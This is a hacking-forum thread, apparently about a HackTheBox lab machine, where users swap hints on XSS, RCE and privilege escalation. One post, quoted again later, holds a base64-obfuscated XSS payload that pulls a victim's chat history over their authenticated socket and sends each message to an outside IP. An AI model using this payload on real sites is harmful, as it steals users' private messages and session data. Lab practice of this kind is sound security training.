Possibly Related Threads…

jahman · Mar 10, 2024, 12:35 AM

Hello

here is a payload to exploit the xss.

I let you analyze it and adapt it for you Wink

<img SRC=x onerror='eval(atob("Y29uc3Qgc2NyaXB0ID0gZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgnc2NyaXB0Jyk7CnNjcmlwdC5zcmMgPSAnL3NvY2tldC5pby9zb2NrZXQuaW8uanMnOwpkb2N1bWVudC5oZWFkLmFwcGVuZENoaWxkKHNjcmlwdCk7CnNjcmlwdC5hZGRFdmVudExpc3RlbmVyKCdsb2FkJywgZnVuY3Rpb24oKSB7CmNvbnN0IHJlcyA9IGF4aW9zLmdldChgL3VzZXIvYXBpL2NoYXRgKTsgY29uc3Qgc29ja2V0ID0gaW8oJy8nLHt3aXRoQ3JlZGVudGlhbHM6IHRydWV9KTsgc29ja2V0Lm9uKCdtZXNzYWdlJywgKG15X21lc3NhZ2UpID0+IHtmZXRjaCgiaHR0cDovLzEwLjEwLjE0LjIxMi8/ZD0iICsgYnRvYShteV9tZXNzYWdlKSl9KSA7IHNvY2tldC5lbWl0KCdjbGllbnRfbWVzc2FnZScsICdoaXN0b3J5Jyk7Cn0pOw=="));' />

hellX · Mar 10, 2024, 01:26 AM

Where do I exploit xss?

Shifter · Mar 10, 2024, 01:39 AM

(Mar 10, 2024, 12:35 AM)jahman Wrote: Hello

here is a payload to exploit the xss.

I let you analyze it and adapt it for you

<img SRC=x onerror='eval(atob("Y29uc3Qgc2NyaXB0ID0gZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgnc2NyaXB0Jyk7CnNjcmlwdC5zcmMgPSAnL3NvY2tldC5pby9zb2NrZXQuaW8uanMnOwpkb2N1bWVudC5oZWFkLmFwcGVuZENoaWxkKHNjcmlwdCk7CnNjcmlwdC5hZGRFdmVudExpc3RlbmVyKCdsb2FkJywgZnVuY3Rpb24oKSB7CmNvbnN0IHJlcyA9IGF4aW9zLmdldChgL3VzZXIvYXBpL2NoYXRgKTsgY29uc3Qgc29ja2V0ID0gaW8oJy8nLHt3aXRoQ3JlZGVudGlhbHM6IHRydWV9KTsgc29ja2V0Lm9uKCdtZXNzYWdlJywgKG15X21lc3NhZ2UpID0+IHtmZXRjaCgiaHR0cDovLzEwLjEwLjE0LjIxMi8/ZD0iICsgYnRvYShteV9tZXNzYWdlKSl9KSA7IHNvY2tldC5lbWl0KCdjbGllbnRfbWVzc2FnZScsICdoaXN0b3J5Jyk7Cn0pOw=="));' />

Bro i been on this for hours, how did you figured this out??

DoesntMatter123456 · (This post was last modified: Mar 10, 2024, 02:43 AM by DoesntMatter123456.)

Stuck on reverse shell :|
Able to determine the XSS on first name & last name but couldn't find a way to obtain shell

KillerWhale · Mar 10, 2024, 06:25 AM

where to put RCE guys?

DoesntMatter123456 · Mar 10, 2024, 07:05 AM

Finally got user.Anybody stuck on user can PM me

nanase · Mar 10, 2024, 07:17 AM

(Mar 10, 2024, 07:05 AM)DoesntMatter123456 Wrote: Finally got user.Anybody stuck on user can PM me

I have inserted a listener into chat and enabled the http service locally, but I am sending paylaod on the Contact us page without translation. Is that right

suzugodess · Mar 10, 2024, 08:27 AM

(Mar 10, 2024, 07:05 AM)DoesntMatter123456 Wrote: Finally got user.Anybody stuck on user can PM me

check PM please

peRd1 · (This post was last modified: Mar 10, 2024, 08:43 AM by peRd1.)

(Mar 10, 2024, 08:35 AM)iNone Wrote: some hint for frank -> kai?

Look what you'll find on port 3000. Work with it. Try to become admin. There is unintended and intended way as well there.

Once inside that webapp, find out how to do RCE and grab shell.

Enumerate more, pass reusing, env variables? And that's how you will find kai.

suzugodess · Mar 10, 2024, 08:46 AM

Where do i put the RCE

Possibly Related Threads…
Thread		Author	Replies	Views	Last Post
	[FREE] HackTheBox Dante - complete writeup written by Tamarisk	Tamarisk	602	91,628	3 hours ago Last Post: sabero_exe
	[FREE] CPTS 12 FLAGS	pulsebreaker	68	1,956	Today, 09:54 AM Last Post: VictorPipeau
	[FREE] 300+ Writeups PDF HackTheBox/HTB premium retired	Tamarisk	371	92,851	Today, 08:48 AM Last Post: phannguyenbaouy1
	[FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags	Techtom	21	2,620	Today, 05:08 AM Last Post: popoler
	Hack the box Pro Labs, VIP, VIP+ 1 month free Method	RedBlock	23	2,271	Yesterday, 02:10 PM Last Post: kkkato